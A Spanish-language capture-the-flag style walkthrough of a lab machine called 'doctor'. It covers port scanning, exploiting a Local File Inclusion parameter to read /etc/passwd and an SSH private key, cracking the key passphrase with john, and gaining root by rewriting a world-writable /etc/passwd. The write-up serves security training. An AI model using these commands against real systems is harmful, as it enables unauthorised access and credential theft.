Enumeramos puertos:
❯ sudo nmap -p- -sS -n -Pn -oG 01-allPorts 192.168.1.79❯ nmap -sCV -p22,80 -oN 02-targeted.txt 192.168.1.79
Starting Nmap 7.94 ( https://nmap.org ) at 2024-05-06 23:01 -04
Nmap scan report for 192.168.1.79
Host is up (0.00037s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 44:95:50:0b:e4:73:a1:85:11:ca:10:ec:1c:cb:d4:26 (RSA)
| 256 27:db:6a:c7:3a:9c:5a:0e:47:ba:8d:81:eb:d6:d6:3c (ECDSA)
|_ 256 e3:07:56:a9:25:63:d4:ce:39:01:c1:9a:d9:fe:de:64 (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-title: Docmed
|_http-server-header: Apache/2.4.38 (Debian)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.87 secondsNavegando por el sitio observamos que la sección de doctores carga el contenido mediante un parámetro include, lo que delata una vulnerabilidad de Local File Inclusion. Abusando del parámetro, leemos /etc/passwd y confirmamos la existencia del usuario admin:
http://192.168.1.79/doctor-item.php?include=Doctors.html
❯ curl 'http://192.168.1.79/doctor-item.php?include=/etc/passwd
...
admin:x:1000:1000:admin,,,:/home/admin:/bin/bash
...Aprovechamos el mismo LFI para extraer la clave privada SSH del usuario:
❯ curl 'http://192.168.1.79/doctor-item.php?include=/home/admin/.ssh/id_rsa' -o id_rsa
-----BEGIN RSA PRIVATE KEY-----
...
-----END RSA PRIVATE KEY-----La clave está protegida con passphrase, así que la crackeamos con john:
❯ /opt/john/run/ssh2john.py id_rsa > hash
❯ /opt/john/run/john -w=/home/wh01s17/Documentos/wordlists/rockyou.txt hash
...
unicorn (id_rsa)
...Con la passphrase unicorn nos conectamos por SSH como admin y obtenemos la primera flag:
❯ ssh admin@192.168.1.79 -i id_rsa
The authenticity of host '192.168.1.79 (192.168.1.79)' can't be established.
ED25519 key fingerprint is SHA256:0x3tf1iiGyqlMEM47ZSWSJ4hLBu7FeVaeaT2FxM7iq8.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.1.79' (ED25519) to the list of known hosts.
Enter passphrase for key 'id_rsa': unicorn
Linux doctor 4.19.0-17-amd64 #1 SMP Debian 4.19.194-3 (2021-07-18) x86_64
admin@doctor:~$Para escalar privilegios, comprobamos si tenemos permisos sobre algún archivo crítico del sistema (Writable Critical Files Privesc). Resulta que /etc/passwd es escribible por todos:
admin@doctor:~$ ls -l /etc/passwd
-rw----rw- 1 root root 1395 abr 21 2023 /etc/passwdGeneramos un hash de contraseña en formato compatible con /etc/passwd usando openssl:
❯ openssl passwd -1
Password: 1234
Verifying - Password: 1234
$1$pIbEKbAQ$hpMd40txGbBrL.iqh.6/51Sustituimos el campo de contraseña de la entrada de root por nuestro hash y nos autenticamos como root:
admin@doctor:~$ cat /etc/passwd
...
root:$1$pIbEKbAQ$hpMd40txGbBrL.iqh.6/51:0:0:root:/root:/bin/bash
...
admin@doctor:~$ su root
Contraseña: 1234
root@doctor:/home/admin#Obtenemos nuestra flag y fin.